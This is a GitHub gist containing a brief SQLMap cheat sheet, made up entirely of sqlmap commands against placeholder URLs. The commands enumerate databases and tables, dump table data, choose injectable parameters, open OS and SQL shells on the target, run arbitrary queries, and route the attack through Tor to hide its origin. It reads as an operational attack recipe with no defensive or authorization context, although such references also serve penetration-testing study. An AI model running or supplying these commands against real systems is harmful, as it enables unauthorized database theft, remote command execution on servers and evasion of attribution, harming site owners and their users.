Skip to content

Instantly share code, notes, and snippets.

@shizonic

shizonic/sqlmap-cheat-sheet.md

Forked from ingramali/sqlmap-cheat-sheet.md
Created January 8, 2025 20:17
Show Gist options
  • Save shizonic/703087127f4f3a99ac0c337876e99467 to your computer and use it in GitHub Desktop.
Save shizonic/703087127f4f3a99ac0c337876e99467 to your computer and use it in GitHub Desktop.
Download ZIP
SQLMap Cheat Sheet
Raw
sqlmap-cheat-sheet.md 
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

# Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

# Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

# Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell

# Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell

# SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

# Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment